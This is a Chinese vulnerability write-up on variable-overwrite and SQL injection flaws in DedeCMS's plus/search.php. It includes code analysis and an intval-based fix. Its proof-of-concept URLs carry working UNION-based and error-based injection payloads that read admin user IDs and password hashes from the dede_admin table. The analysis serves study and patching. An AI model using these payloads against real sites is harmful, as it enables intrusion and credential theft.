catalog
1. 漏洞描述 2. 漏洞觸發條件 3. 漏洞影響範圍 4. 漏洞程式碼分析 5. 防禦方法 6. 攻防思考
1. 漏洞描述
這個檔案有兩處注入漏洞
1. $typeid變數覆蓋導致ChannelTypeid被強制改變: 低風險 2. $typeArr的本地變數覆蓋注入+$typeid變數覆蓋導致SQL隱碼攻擊: 高風險
Relevant Link:
http://graysb.diandian.com/post/2013-03-10/40049018798 http://0day5.com/archives/341
2. 漏洞觸發條件
0x1: POC1
http://dede/plus/search.php?typeid=1&keyword=test /* 在請求的時候URL中要帶上keyword,因為在search.php中有對keyword的檢測 if(($keyword=='' || strlen($keyword)<2) && empty($typeid)) { ShowMsg('關鍵字不能小於2個位元組!','-1'); exit(); } */
0x2: POC2
http://localhost/dede/plus/search.php?typeArr[1%201%3d2union%20select%20pwd%20from%20dede_admin]=11&kwtype=0&q=11 //$typeArr的鍵本身是payload,keyword要和這個鍵的值相同
0x3: Safe Alert: Request Error step 2 !
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
0x4: Safe Alert: Request Error step 1 !
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
Relevant Link:
http://zone.wooyun.org/content/2414
3. 漏洞影響範圍
4. 漏洞程式碼分析
0x1: $typeid變數覆蓋導致ChannelTypeid被強制改變
\plus\search.php
.. $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; .. $sp = new SearchView($typeid,$keyword,$orderby,$channeltype,$searchtype,$starttime,$pagesize,$kwtype,$mid); ..
\include\arc.searchview.class.php
... //php5建構函式 function __construct($typeid,$keyword,$orderby,$achanneltype="all", $searchtype='',$starttime=0,$upagesize=20,$kwtype=1,$mid=0) { global $cfg_search_max,$cfg_search_maxrc,$cfg_search_time; if(empty($upagesize)) { $upagesize = 10; } //直接賦值 $this->TypeID = $typeid; .. } ..
0x2: $typeArr的本地變數覆蓋注入+$typeid變數覆蓋導致SQL隱碼攻擊
\plus\search.php
//查詢欄目資訊 if(empty($typeid)) { ... //引入欄目快取並看關鍵字是否有相關欄目內容 require_once($typenameCacheFile); //黑客通過本地變數覆蓋漏洞改變$typeArr變數的值,進入if判斷邏輯 if(isset($typeArr) && is_array($typeArr)) { //1. 遍歷這個全域性陣列$typeArr,從中取出鍵值對 foreach($typeArr as $id => $typename) { /* 2. 從我們輸入的關鍵字引數$keyword中刪除這個全域性陣列($typeArr)中出現過的值,也就是說,這個$typeArr本來是充當一個敏感關鍵字的陣列的作用 3. 注意,str_replace()返回的是替換後的陣列或者字串 4. 如果檢測到了我們規定的關鍵字($typeArr中儲存的值)出現在了我們輸出的$keyword引數中,就進行過濾並刪除 */ $keywordn = str_replace($typename, ' ', $keyword); if($keyword != $keywordn) { $keyword = $keywordn; //5. 但是在過濾的過程中,卻發生了另一個本地變數覆蓋,$typeid這個變數會被"直接"帶入到後續的SQL查詢中 $typeid = $id; break; } } } }
\include\arc.searchview.class.php
function __construct($typeid,$keyword,$orderby,$achanneltype="all", $searchtype='',$starttime=0,$upagesize=20,$kwtype=1,$mid=0) { .. $this->TypeID = $typeid; ... else { //將可能包含黑客注入畸形字元的$this->TypeID直接帶入SQL查詢 $row =$this->dsql->GetOne("SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}"); $this->ChannelTypeid=$row['channeltype']; } .. } ..
這種注入是利用了陣列的鍵進行了注入
Relevant Link:
http://www.2cto.com/Article/201301/184105.html
5. 防禦方法
\plus\search.php
//查詢欄目資訊 if(empty($typeid)) { .. if($keyword != $keywordn) { $keyword = HtmlReplace($keywordn); //對鍵值$id進行規範化處理 $typeid = intval($id); break; } .. } .. //對$typeid進行規範化處理 $typeid = intval($typeid); ..
6. 攻防思考
Copyright (c) 2015 LittleHann All rights reserved